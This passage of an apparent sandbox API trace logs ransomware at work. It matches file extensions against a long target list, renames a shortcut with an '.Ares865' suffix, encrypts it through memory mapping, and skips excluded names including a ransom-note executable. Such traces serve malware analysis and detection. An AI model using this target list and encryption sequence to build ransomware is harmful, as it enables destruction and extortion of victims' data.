(lpString=".ini") returned 4 [0058.503] lstrcmpiW (lpString1="Control Panel.lnk", lpString2=".ini") returned 1 [0058.503] lstrlenW (lpString=".sys") returned 4 [0058.503] lstrcmpiW (lpString1="Control Panel.lnk", lpString2=".sys") returned 1 [0058.503] lstrlenW (lpString="Control Panel.lnk") returned 17 [0058.503] lstrlenW (lpString="bak") returned 3 [0058.503] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0058.503] lstrlenW (lpString="ba_") returned 3 [0058.503] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0058.503] lstrlenW (lpString="dbb") returned 3 [0058.503] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0058.503] lstrlenW (lpString="vmdk") returned 4 [0058.504] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0058.504] lstrlenW (lpString="rar") returned 3 [0058.504] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0058.504] lstrlenW (lpString="zip") returned 3 [0058.504] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0058.504] lstrlenW (lpString="tgz") returned 3 [0058.504] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0058.504] lstrlenW (lpString="vbox") returned 4 [0058.504] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0058.504] lstrlenW (lpString="vdi") returned 3 [0058.504] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0058.504] lstrlenW (lpString="vhd") returned 3 [0058.504] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0058.504] lstrlenW (lpString="vhdx") returned 4 [0058.504] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0058.504] lstrlenW (lpString="avhd") returned 4 [0058.504] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0058.504] lstrlenW (lpString="db") returned 2 [0058.504] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0058.504] lstrlenW (lpString="db2") returned 3 [0058.504] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0058.504] lstrlenW (lpString="db3") returned 3 [0058.504] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0058.504] lstrlenW (lpString="dbf") returned 3 [0058.504] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0058.504] lstrlenW (lpString="mdf") returned 3 [0058.504] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0058.504] lstrlenW (lpString="mdb") returned 3 [0058.504] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0058.504] lstrlenW (lpString="sql") returned 3 [0058.504] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0058.504] lstrlenW (lpString="sqlite") returned 6 [0058.504] lstrcmpiW (lpString1="el.lnk", lpString2="sqlite") returned -1 [0058.504] lstrlenW (lpString="sqlite3") returned 7 [0058.504] lstrcmpiW (lpString1="nel.lnk", lpString2="sqlite3") returned -1 [0058.504] lstrlenW (lpString="sqlitedb") returned 8 [0058.504] lstrcmpiW (lpString1="anel.lnk", lpString2="sqlitedb") returned -1 [0058.504] lstrlenW (lpString="xml") returned 3 [0058.505] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0058.505] lstrlenW (lpString="$er") returned 3 [0058.505] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0058.505] lstrlenW (lpString="4dd") returned 3 [0058.505] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0058.505] lstrlenW (lpString="4dl") returned 3 [0058.505] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0058.505] lstrlenW (lpString="^^^") returned 3 [0058.505] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0058.505] lstrlenW (lpString="abs") returned 3 [0058.505] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0058.505] lstrlenW (lpString="abx") returned 3 [0058.505] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0058.505] lstrlenW (lpString="accdb") returned 5 [0058.505] lstrcmpiW (lpString1="l.lnk", lpString2="accdb") returned 1 [0058.505] lstrlenW (lpString="accdc") returned 5 [0058.505] lstrcmpiW (lpString1="l.lnk", lpString2="accdc") returned 1 [0058.505] lstrlenW (lpString="accde") returned 5 [0058.505] lstrcmpiW (lpString1="l.lnk", lpString2="accde") returned 1 [0058.505] lstrlenW (lpString="accdr") returned 5 [0058.505] lstrcmpiW (lpString1="l.lnk", lpString2="accdr") returned 1 [0058.505] lstrlenW (lpString="accdt") returned 5 [0058.505] lstrcmpiW (lpString1="l.lnk", lpString2="accdt") returned 1 [0058.505] lstrlenW (lpString="accdw") returned 5 [0058.505] lstrcmpiW (lpString1="l.lnk", lpString2="accdw") returned 1 [0058.505] lstrlenW (lpString="accft") returned 5 [0058.505] lstrcmpiW (lpString1="l.lnk", lpString2="accft") returned 1 [0058.505] lstrlenW (lpString="adb") returned 3 [0058.505] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0058.505] lstrlenW (lpString="adb") returned 3 [0058.505] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0058.505] lstrlenW (lpString="ade") returned 3 [0058.505] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0058.505] lstrlenW (lpString="adf") returned 3 [0058.505] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0058.505] lstrlenW (lpString="adn") returned 3 [0058.505] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0058.506] lstrlenW (lpString="adp") returned 3 [0058.506] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0058.506] lstrlenW (lpString="alf") returned 3 [0058.506] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0058.506] lstrlenW (lpString="ask") returned 3 [0058.506] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0058.506] lstrlenW (lpString="btr") returned 3 [0058.506] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0058.506] lstrlenW (lpString="cat") returned 3 [0058.506] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0058.506] lstrlenW (lpString="cdb") returned 3 [0058.506] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0058.506] lstrlenW (lpString="ckp") returned 3 [0058.506] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0058.506] lstrlenW (lpString="cma") returned 3 [0058.506] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0058.506] lstrlenW (lpString="cpd") returned 3 [0058.506] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0058.506] lstrlenW (lpString="dacpac") returned 6 [0058.506] lstrcmpiW (lpString1="el.lnk", lpString2="dacpac") returned 1 [0058.506] lstrlenW (lpString="dad") returned 3 [0058.506] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0058.506] lstrlenW (lpString="dadiagrams") returned 10 [0058.506] lstrcmpiW (lpString1=" Panel.lnk", lpString2="dadiagrams") returned -1 [0058.506] lstrlenW (lpString="daschema") returned 8 [0058.506] lstrcmpiW (lpString1="anel.lnk", lpString2="daschema") returned -1 [0058.506] lstrlenW (lpString="db-journal") returned 10 [0058.506] lstrcmpiW (lpString1=" Panel.lnk", lpString2="db-journal") returned -1 [0058.506] lstrlenW (lpString="db-shm") returned 6 [0058.506] lstrcmpiW (lpString1="el.lnk", lpString2="db-shm") returned 1 [0058.506] lstrlenW (lpString="db-wal") returned 6 [0058.506] lstrcmpiW (lpString1="el.lnk", lpString2="db-wal") returned 1 [0058.506] lstrlenW (lpString="dbc") returned 3 [0058.506] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0058.506] lstrlenW (lpString="dbs") returned 3 [0058.506] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0058.507] lstrlenW (lpString="dbt") returned 3 [0058.507] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0058.507] lstrlenW (lpString="dbv") returned 3 [0058.507] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0058.507] lstrlenW (lpString="dbx") returned 3 [0058.507] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0058.507] lstrlenW (lpString="dcb") returned 3 [0058.507] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0058.507] lstrlenW (lpString="dct") returned 3 [0058.507] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0058.507] lstrlenW (lpString="dcx") returned 3 [0058.507] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0058.507] lstrlenW (lpString="ddl") returned 3 [0058.507] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0058.507] lstrlenW (lpString="dlis") returned 4 [0058.507] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0058.507] lstrlenW (lpString="dp1") returned 3 [0058.507] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0058.507] lstrlenW (lpString="dqy") returned 3 [0058.507] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0058.507] lstrlenW (lpString="dsk") returned 3 [0058.507] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0058.507] lstrlenW (lpString="dsn") returned 3 [0058.507] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0058.507] lstrlenW (lpString="dtsx") returned 4 [0058.507] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0058.507] lstrlenW (lpString="dxl") returned 3 [0058.507] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0058.507] lstrlenW (lpString="eco") returned 3 [0058.507] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0058.507] lstrlenW (lpString="ecx") returned 3 [0058.507] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0058.507] lstrlenW (lpString="edb") returned 3 [0058.507] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0058.507] lstrlenW (lpString="epim") returned 4 [0058.507] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0058.507] lstrlenW (lpString="fcd") returned 3 [0058.508] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0058.508] lstrlenW (lpString="fdb") returned 3 [0058.508] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0058.508] lstrlenW (lpString="fic") returned 3 [0058.508] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0058.508] lstrlenW (lpString="flexolibrary") returned 12 [0058.508] lstrcmpiW (lpString1="ol Panel.lnk", lpString2="flexolibrary") returned 1 [0058.508] lstrlenW (lpString="fm5") returned 3 [0058.508] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0058.508] lstrlenW (lpString="fmp") returned 3 [0058.508] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0058.508] lstrlenW (lpString="fmp12") returned 5 [0058.508] lstrcmpiW (lpString1="l.lnk", lpString2="fmp12") returned 1 [0058.508] lstrlenW (lpString="fmpsl") returned 5 [0058.508] lstrcmpiW (lpString1="l.lnk", lpString2="fmpsl") returned 1 [0058.508] lstrlenW (lpString="fol") returned 3 [0058.508] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0058.508] lstrlenW (lpString="fp3") returned 3 [0058.508] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0058.508] lstrlenW (lpString="fp4") returned 3 [0058.508] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0058.508] lstrlenW (lpString="fp5") returned 3 [0058.508] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0058.508] lstrlenW (lpString="fp7") returned 3 [0058.508] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0058.508] lstrlenW (lpString="fpt") returned 3 [0058.508] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0058.508] lstrlenW (lpString="frm") returned 3 [0058.508] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0058.508] lstrlenW (lpString="gdb") returned 3 [0058.508] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0058.508] lstrlenW (lpString="gdb") returned 3 [0058.508] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0058.508] lstrlenW (lpString="grdb") returned 4 [0058.508] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0058.508] lstrlenW (lpString="gwi") returned 3 [0058.508] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0058.508] lstrlenW (lpString="hdb") returned 3 [0058.509] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0058.509] lstrlenW (lpString="his") returned 3 [0058.509] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0058.509] lstrlenW (lpString="ib") returned 2 [0058.509] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0058.509] lstrlenW (lpString="idb") returned 3 [0058.509] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0058.509] lstrlenW (lpString="ihx") returned 3 [0058.509] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0058.509] lstrlenW (lpString="itdb") returned 4 [0058.509] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0058.509] lstrlenW (lpString="itw") returned 3 [0058.509] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0058.509] lstrlenW (lpString="jet") returned 3 [0058.509] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0058.509] lstrlenW (lpString="jtx") returned 3 [0058.509] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0058.509] lstrlenW (lpString="kdb") returned 3 [0058.509] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0058.509] lstrlenW (lpString="kexi") returned 4 [0058.509] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0058.509] lstrlenW (lpString="kexic") returned 5 [0058.509] lstrcmpiW (lpString1="l.lnk", lpString2="kexic") returned 1 [0058.509] lstrlenW (lpString="kexis") returned 5 [0058.509] lstrcmpiW (lpString1="l.lnk", lpString2="kexis") returned 1 [0058.509] lstrlenW (lpString="lgc") returned 3 [0058.509] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0058.509] lstrlenW (lpString="lwx") returned 3 [0058.509] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0058.509] lstrlenW (lpString="maf") returned 3 [0058.509] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0058.509] lstrlenW (lpString="maq") returned 3 [0058.509] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0058.509] lstrlenW (lpString="mar") returned 3 [0058.509] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0058.509] lstrlenW (lpString="marshal") returned 7 [0058.510] lstrcmpiW (lpString1="nel.lnk", lpString2="marshal") returned 1 [0058.510] lstrlenW (lpString="mas") returned 3 [0058.510] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0058.510] lstrlenW (lpString="mav") returned 3 [0058.510] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0058.510] lstrlenW (lpString="maw") returned 3 [0058.510] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0058.510] lstrlenW (lpString="mdbhtml") returned 7 [0058.510] lstrcmpiW (lpString1="nel.lnk", lpString2="mdbhtml") returned 1 [0058.510] lstrlenW (lpString="mdn") returned 3 [0058.510] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0058.510] lstrlenW (lpString="mdt") returned 3 [0058.510] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0058.510] lstrlenW (lpString="mfd") returned 3 [0058.510] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0058.510] lstrlenW (lpString="mpd") returned 3 [0058.510] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0058.510] lstrlenW (lpString="mrg") returned 3 [0058.510] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0058.510] lstrlenW (lpString="mud") returned 3 [0058.510] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0058.510] lstrlenW (lpString="mwb") returned 3 [0058.510] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0058.511] lstrlenW (lpString="myd") returned 3 [0058.511] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0058.511] lstrlenW (lpString="ndf") returned 3 [0058.511] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0058.511] lstrlenW (lpString="nnt") returned 3 [0058.511] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0058.511] lstrlenW (lpString="nrmlib") returned 6 [0058.511] lstrcmpiW (lpString1="el.lnk", lpString2="nrmlib") returned -1 [0058.511] lstrlenW (lpString="ns2") returned 3 [0058.511] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0058.511] lstrlenW (lpString="ns3") returned 3 [0058.511] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0058.511] lstrlenW (lpString="ns4") returned 3 [0058.511] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0058.511] lstrlenW (lpString="nsf") returned 3 [0058.511] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0058.511] lstrlenW (lpString="nv") returned 2 [0058.511] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0058.511] lstrlenW (lpString="nv2") returned 3 [0058.511] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0058.511] lstrlenW (lpString="nwdb") returned 4 [0058.511] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0058.511] lstrlenW (lpString="nyf") returned 3 [0058.511] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0058.511] lstrlenW (lpString="odb") returned 3 [0058.511] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0058.511] lstrlenW (lpString="odb") returned 3 [0058.511] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0058.511] lstrlenW (lpString="oqy") returned 3 [0058.511] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0058.511] lstrlenW (lpString="ora") returned 3 [0058.511] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0058.511] lstrlenW (lpString="orx") returned 3 [0058.511] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0058.511] lstrlenW (lpString="owc") returned 3 [0058.511] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0058.511] lstrlenW (lpString="p96") returned 3 [0058.512] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0058.512] lstrlenW (lpString="p97") returned 3 [0058.512] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0058.512] lstrlenW (lpString="pan") returned 3 [0058.512] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0058.512] lstrlenW (lpString="pdb") returned 3 [0058.512] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0058.512] lstrlenW (lpString="pdm") returned 3 [0058.512] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0058.512] lstrlenW (lpString="pnz") returned 3 [0058.512] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0058.512] lstrlenW (lpString="qry") returned 3 [0058.512] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0058.512] lstrlenW (lpString="qvd") returned 3 [0058.512] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0058.512] lstrlenW (lpString="rbf") returned 3 [0058.512] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0058.512] lstrlenW (lpString="rctd") returned 4 [0058.512] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0058.512] lstrlenW (lpString="rod") returned 3 [0058.512] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0058.512] lstrlenW (lpString="rodx") returned 4 [0058.512] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0058.512] lstrlenW (lpString="rpd") returned 3 [0058.512] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0058.512] lstrlenW (lpString="rsd") returned 3 [0058.512] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0058.512] lstrlenW (lpString="sas7bdat") returned 8 [0058.512] lstrcmpiW (lpString1="anel.lnk", lpString2="sas7bdat") returned -1 [0058.512] lstrlenW (lpString="sbf") returned 3 [0058.512] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0058.512] lstrlenW (lpString="scx") returned 3 [0058.512] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0058.512] lstrlenW (lpString="sdb") returned 3 [0058.512] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0058.512] lstrlenW (lpString="sdc") returned 3 [0058.512] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0058.512] lstrlenW (lpString="sdf") returned 3 [0058.513] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0058.513] lstrlenW (lpString="sis") returned 3 [0058.513] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0058.513] lstrlenW (lpString="spq") returned 3 [0058.513] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0058.513] lstrlenW (lpString="te") returned 2 [0058.513] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0058.513] lstrlenW (lpString="teacher") returned 7 [0058.513] lstrcmpiW (lpString1="nel.lnk", lpString2="teacher") returned -1 [0058.513] lstrlenW (lpString="tmd") returned 3 [0058.513] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0058.513] lstrlenW (lpString="tps") returned 3 [0058.513] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0058.513] lstrlenW (lpString="trc") returned 3 [0058.513] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0058.513] lstrlenW (lpString="trc") returned 3 [0058.513] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0058.513] lstrlenW (lpString="trm") returned 3 [0058.513] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0058.513] lstrlenW (lpString="udb") returned 3 [0058.513] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0058.513] lstrlenW (lpString="udl") returned 3 [0058.513] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0058.513] lstrlenW (lpString="usr") returned 3 [0058.513] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0058.513] lstrlenW (lpString="v12") returned 3 [0058.513] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0058.513] lstrlenW (lpString="vis") returned 3 [0058.513] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0058.513] lstrlenW (lpString="vpd") returned 3 [0058.513] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0058.513] lstrlenW (lpString="vvv") returned 3 [0058.513] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0058.513] lstrlenW (lpString="wdb") returned 3 [0058.513] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0058.513] lstrlenW (lpString="wmdb") returned 4 [0058.513] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0058.513] lstrlenW (lpString="wrk") returned 3 [0058.514] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0058.514] lstrlenW (lpString="xdb") returned 3 [0058.514] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0058.514] lstrlenW (lpString="xld") returned 3 [0058.514] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0058.514] lstrlenW (lpString="xmlff") returned 5 [0058.514] lstrcmpiW (lpString1="l.lnk", lpString2="xmlff") returned -1 [0058.514] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk.Ares865") returned 92 [0058.514] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\system tools\\control panel.lnk"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\system tools\\control panel.lnk.ares865"), dwFlags=0x1) returned 1 [0058.518] CreateFileW (lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\system tools\\control panel.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0058.518] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=262) returned 1 [0058.518] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.518] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0058.518] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0058.518] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0058.519] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0058.519] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.519] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x410, lpName=0x0) returned 0x120 [0058.522] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x410) returned 0x190000 [0058.528] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0058.528] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0058.528] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.529] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0058.529] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0058.529] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.529] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.529] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.529] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.529] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.529] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.529] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.529] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.529] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.529] CloseHandle (hObject=0x120) returned 1 [0058.529] CloseHandle (hObject=0x15c) returned 1 [0058.531] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0058.531] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0058.531] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.531] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xec119aaf, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x921e7f, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x2e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0058.531] lstrcmpiW (lpString1="Desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.531] lstrcmpiW (lpString1="Desktop.ini", lpString2="aoldtz.exe") returned 1 [0058.531] lstrcmpiW (lpString1="Desktop.ini", lpString2=".") returned 1 [0058.531] lstrcmpiW (lpString1="Desktop.ini", lpString2="..") returned 1 [0058.531] lstrcmpiW (lpString1="Desktop.ini", lpString2="windows") returned -1 [0058.531] lstrcmpiW (lpString1="Desktop.ini", lpString2="bootmgr") returned 1 